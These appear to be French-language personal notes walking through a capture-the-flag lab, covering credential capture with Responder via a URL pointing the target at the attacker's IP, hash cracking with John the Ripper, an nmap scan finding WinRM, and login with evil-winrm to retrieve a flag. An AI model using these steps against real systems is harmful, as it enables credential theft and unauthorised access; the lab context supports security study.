Responder 


-------------------------- Task 7 --------------------------
on utilise le flag -I pour spécifier une interface

exemple -> responder -I 10.10.14.92

responder -> 
	appel a l'outils 
-I -> 
	precision de l'interface
10.10.14.92 -> 
	adress ip sur la quelle le responder doit renvoyer les information (dans ce cas notre adress ip)

dans le navigateur on utilise http://domaine.cible\\10.10.14.92/toto

http://domaine.cible -> 
	comme son nom l'indique
\\10.10.14.92 -> 
	suivi de l'adress communiquer dans le responder pour que les information recolter lui soit envoyer
/toto -> 
	suivi d'un dossier fictif vers le quelle envoyer les information (le responder en question)


-------------------------- Task 8 --------------------------

Trouver l'outils qui permet de crack des password et souvent appeller john!

-> John The Ripper Obviously!

-------------------------- Task 9 --------------------------

Decryptons le password en utilisant john the ripper

command utiliser -> john --wordlist=/usr/share/wordlists/rockyou.txt

on appel john puis on lui passe une wordlist bien précise pour ne pas qu'il passe tout en revu et pour une question de rapidité et clui ci nous retourneras si tout ce passe bien le mot de passe voulu
	

Résultat -> badminbton Obviously!!!

-------------------------- Task 10 --------------------------

scan nmap de base uniquement sur 1000 ports

precision des 6000 premier scan pour avoir la vu sur le port 5985

avec -> 
	namp -p int1-int2 -sV -sC [ip]
	
ainsi on voit le port 5985 reponse a la task 10

-------------------------- Task 11 ---------------------------


Ce qui permet d'exploiter une faille windows et evil-winrm

ainsi on telecharge evil-winrm

on ce connecte à la cible en faisaint une command tel que vu dans le help ->
	evil-winrm -ip [ip] de la cible -u 'admin name' -p 'password de la cible'
	
AINSI APRES QUELQUE RECHERCHE DANS LES FICHIER DIVERS LE FLAG EST TROUVE AU CHEMIN SUIVANT ---> /user/mike/desktop/flag.txt. 





